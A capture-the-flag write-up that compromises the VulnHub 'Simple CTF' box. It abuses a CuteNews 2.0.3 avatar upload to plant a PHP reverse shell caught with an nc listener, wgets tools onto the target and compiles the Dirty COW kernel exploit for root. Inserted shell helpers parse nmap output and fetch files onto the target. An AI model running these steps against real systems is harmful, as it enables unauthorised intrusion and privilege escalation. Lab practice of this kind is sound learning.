Simple CTF Write-Up

Introduction

Simple CTF is a boot-to-root challenge courtesy of SecTalks. It can be found on VulnHub or on the SecTalks GitHub page. The challenge focuses on web application vulnerabilities, with a single flag at /root/flag.txt. To complete this CTF, I used the latest distribution of Kali Linux for VirtualBox. Initial compromise of the machine came quickly, but I had to do some research on privilege escalation before I got root.

Initial Setup

To set up for the challenge, I downloaded the CTF image from VulnHub and added it to my pentest lab environment in VirtualBox. For information on how to create your own home lab, see my GitHub repo Thank it Forward. I used Kali Linux as the attack machine and put both machines on the same host-only network (vboxnet0). After launching both machines, it was time to get started.

Getting Started

To start, I found my attack machine's IP address with the ifconfig command.

$ ifconfig

This showed my Kali machine was 192.168.56.106. To find the Simple CTF box's IP, I used arp-scan (it needs raw-socket access, so run it as root) and found the box was 192.168.56.104.

$ arp-scan -I [interface] -l

With this basic information, I was able to start some basic enumeration scans. By default, I typically run a few common nmap scans to get started and see which services the CTF box is running. These initial scans were commands like…

$ nmap -T5 192.168.56.104
$ nmap -sS -sV -A -O 192.168.56.104

The nmap scans found an open web server on port 80, which meant I could interact with the machine through my browser. I immediately opened Firefox and checked out the website. Additionally, I ran dirb against the web server to brute-force directory and file names from its wordlist.

$ dirb http://192.168.56.104

Dirb found a few directories, but nothing immediately jumped out at me.
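The same recon step with the nmap result parsed instead of read off the screen. This is an added example and not part of the original write-up: it reads nmap's greppable output (-oG), lists the open ports, and turns any HTTP-looking service into a URL ready to hand to dirb. The sample scan file it writes is constructed for illustration; the port list and version strings are not the Simple CTF box's real results.

```shell
#!/bin/sh
# Added example (not from the write-up): parse nmap -oG output and build
# dirb targets from it. Run the real scan with
#   nmap -sS -sV -oG scan.gnmap 192.168.56.104
# and then: http_targets scan.gnmap | xargs -n1 dirb

# Print "host port proto service" for every open port in a .gnmap file.
# A Host line is tab-separated; its "Ports:" field lists entries formatted
# port/state/proto/owner/service/rpcinfo/version/ and separated by ", ".
open_ports() {
    awk -F'\t' '
    /^Host:/ {
        split($1, h, " ")          # "Host: 192.168.56.104 ()" -> h[2] is the IP
        for (i = 2; i <= NF; i++) {
            if ($i ~ /^Ports: /) {
                sub(/^Ports: /, "", $i)
                n = split($i, entries, /, /)
                for (j = 1; j <= n; j++) {
                    split(entries[j], f, "/")
                    if (f[2] == "open") print h[2], f[1], f[3], f[5]
                }
            }
        }
    }' "$1"
}

# Emit one URL per open port whose service name contains "http". nmap writes
# TLS-wrapped services as ssl|<name>, so those get an https:// scheme.
http_targets() {
    open_ports "$1" | awk '
        $4 ~ /http/ {
            scheme = ($4 ~ /https|ssl/) ? "https" : "http"
            printf "%s://%s:%s\n", scheme, $1, $2
        }'
}

# Constructed sample of what the -oG scan writes (illustrative values only,
# not the real Simple CTF results).
write_sample_gnmap() {
    {
        printf '# Nmap 7.91 scan initiated (constructed sample)\n'
        printf 'Host: 192.168.56.104 ()\tStatus: Up\n'
        printf 'Host: 192.168.56.104 ()\tPorts: 22/closed/tcp//ssh///, 80/open/tcp//http//Apache httpd 2.4.7 ((Ubuntu))/, 8443/open/tcp//ssl|https-alt///\tIgnored State: closed (997)\n'
        printf '# Nmap done (constructed sample)\n'
    } > "$1"
}

# Stand-alone demo (sh this.sh demo): write the sample and list the targets.
if [ "${1:-}" = "demo" ]; then
    tmp=$(mktemp)
    write_sample_gnmap "$tmp"
    open_ports "$tmp"
    http_targets "$tmp"
    rm -f "$tmp"
fi
```

Only the first five fields of each port entry are used, so version strings containing odd characters cannot break the parse, and the "Status: Up" host line (which has no Ports field) is skipped naturally.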

Finding Exploits

Doing a manual inspection of the website, I saw the site was running something called “CuteNews v2.0.3”. Having never heard of it, but curious about it, I did some googling. Additionally, I used the searchsploit command to determine whether there were any known vulnerabilities in that application.

$ searchsploit cutenews

The application had a long list of known vulnerabilities.

Searching through the results, I found there was a public exploit available for the exact version Simple CTF was running (2.0.3). I copied the exploit to my desktop and opened it to inspect it.

Reading the exploit documentation showed that the application was vulnerable to arbitrary file upload via the avatar picture upload feature: a .php file uploaded as an avatar is stored under the web root with its extension intact, where the server will execute it. To run the exploit, I would need to create a user account and then upload a malicious file through the “import user profile” option.

I created a user account, “hacker”.

The first web shell I uploaded was one of the Kali Linux defaults, located in the /usr/share/webshells/ directory. There are a few in there, so I tested several of them. Each one allowed me some minor navigation and code execution on the target machine, but I was unimpressed. I researched online for something better and came across the pentestmonkey PHP reverse shell (the same script also ships with Kali as /usr/share/webshells/php/php-reverse-shell.php). I downloaded it and opened it in my text editor, then edited the $ip and $port values at the top, where the comments say “CHANGE THIS”, to my attack machine's IP and my preferred listening port. I chose the listening port 4445.

Before triggering the reverse shell, I needed to set up a listener on my Kali machine to receive the connection. I used the nc command.

$ nc -nlvp 4445

To trigger the reverse shell, I opened the URL of the uploaded file in my browser. CuteNews stores avatars under /uploads/ as avatar_<username>_<filename>, which is why the path below looks the way it does.

http://192.168.56.104/uploads/avatar_hacker_php-reverse-shell.php

This executed the PHP and started the reverse shell; confirmation appeared when my listener received the connection.

Privilege Escalation

Now came the hardest part of this CTF. I had a reverse shell on the target machine, but checking which user I was with the whoami command…

$ whoami

…showed I was www-data, the web server's unprivileged user. I spent a lot of time running manual enumeration with things like…

$ cd
$ cd ..; ls
$ cat

Using these, I simply navigated through directories and saw what was available. I also spent considerable time running through my personal CTF playbook plays for enumeration and re-enumeration. To check out my playbook, visit my GitHub repo CTF Playbook.

I won't waste time here explaining each scan I did, but if you're curious, do check out that repo, as I ran most of the scans there. While this was the most frustrating part of the CTF, I came across a plethora of great privilege escalation and post-exploitation enumeration scripts and articles. These will all be uploaded to my playbook and to my GUI Python CTF tool.

After what seemed like forever, I finally got some traction when I used the Linux Exploit Suggester script. To get the script onto the CTF box, I started a web server on my Kali machine with

$ service apache2 start

I navigated inside the web folder.

$ cd /var/www/html

I then downloaded the script. Note that wget needs the raw file URL: the github.com/…/blob/… page URL returns an HTML page, not the script, and the resulting file will fail with a syntax error when run.

$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

From here it was simple to switch to the reverse shell on the target and use wget again to pull the script from my machine.

$ wget http://192.168.56.106/linux-exploit-suggester.sh

Then I made the script executable and ran it. Only the execute bit is needed; chmod 777 also makes the file world-writable, which there is no reason to do.

$ chmod +x linux-exploit-suggester.sh; ./linux-exploit-suggester.sh
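A small helper for this transfer step, added here as an example rather than taken from the write-up. It pulls a file onto the target with whichever downloader the box has (wget, curl or python3), then refuses to treat the result as a script unless it begins with a shebang, which catches the classic mistake of fetching a GitHub blob page instead of the raw file, and optionally compares it against a SHA-256 computed on the attack machine. The file contents in the demo are constructed.

```shell
#!/bin/sh
# Added example (not from the write-up): fetch a tool onto a target with
# whatever downloader exists and sanity-check it before chmod +x / execute.

# fetch_file URL DEST: try wget, then curl, then python3. Returns 1 if all fail.
fetch_file() {
    url=$1; dest=$2
    if command -v wget >/dev/null 2>&1; then
        wget -q --tries=1 -T 10 -O "$dest" "$url" && return 0
    fi
    if command -v curl >/dev/null 2>&1; then
        curl -fsS --max-time 10 -o "$dest" "$url" && return 0
    fi
    if command -v python3 >/dev/null 2>&1; then
        python3 -c 'import sys, urllib.request; urllib.request.urlretrieve(sys.argv[1], sys.argv[2])' \
            "$url" "$dest" 2>/dev/null && return 0
    fi
    rm -f "$dest"        # do not leave a half-written or empty file behind
    return 1
}

# sha256_of FILE: hex digest via sha256sum (coreutils) or shasum (BSD/macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# check_script FILE [SHA256]: succeed only if FILE is non-empty, starts with
# "#!" (a github.com/.../blob/... URL downloads an HTML page, which does not)
# and, when a digest is given, matches it.
check_script() {
    file=$1; expected=${2:-}
    [ -s "$file" ] || { echo "check_script: $file is empty or missing" >&2; return 1; }
    case $(head -n 1 "$file") in
        '#!'*) ;;
        *) echo "check_script: $file does not start with a shebang (HTML page?)" >&2; return 1 ;;
    esac
    if [ -n "$expected" ] && [ "$(sha256_of "$file")" != "$expected" ]; then
        echo "check_script: $file SHA-256 mismatch" >&2
        return 1
    fi
    return 0
}

# Stand-alone demo with constructed files (sh this.sh demo).
if [ "${1:-}" = "demo" ]; then
    d=$(mktemp -d)
    printf '#!/bin/sh\necho enumerate\n' > "$d/les.sh"
    printf '<!DOCTYPE html>\n<html><body>blob page</body></html>\n' > "$d/blob.html"
    check_script "$d/les.sh" "$(sha256_of "$d/les.sh")" && echo "les.sh: ok, safe to chmod +x"
    check_script "$d/blob.html" || echo "blob.html: rejected"
    rm -rf "$d"
fi
```

Compute the expected digest on the attack machine (sha256sum linux-exploit-suggester.sh) and pass it as the second argument to check_script on the target; a mismatch means the copy was truncated or is not the file you think it is.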

Root Compromise

The script reported the target as likely vulnerable to Dirty COW (CVE-2016-5195). After attempting dirtyc0w 1 and failing, I tried dirtyc0w 2 (Exploit-DB 40847). I downloaded it to the target, saving it under the filename the compile command below expects.

$ wget -O dirtyc0w2.cc https://www.exploit-db.com/download/40847

I used the g++ command from the comment block at the top of the exploit to compile it on the target (which, conveniently, had a compiler installed).

$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dirtyc0w2.cc -lutil

Then I ran the exploit, which quickly gave me root access! Dirty COW is a kernel race-condition exploit, so it is worth snapshotting the VM before running it in case the kernel falls over.

After confirming I was root, I went to /root and used cat to read the flag. The flag reads…

root@simple:~# cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
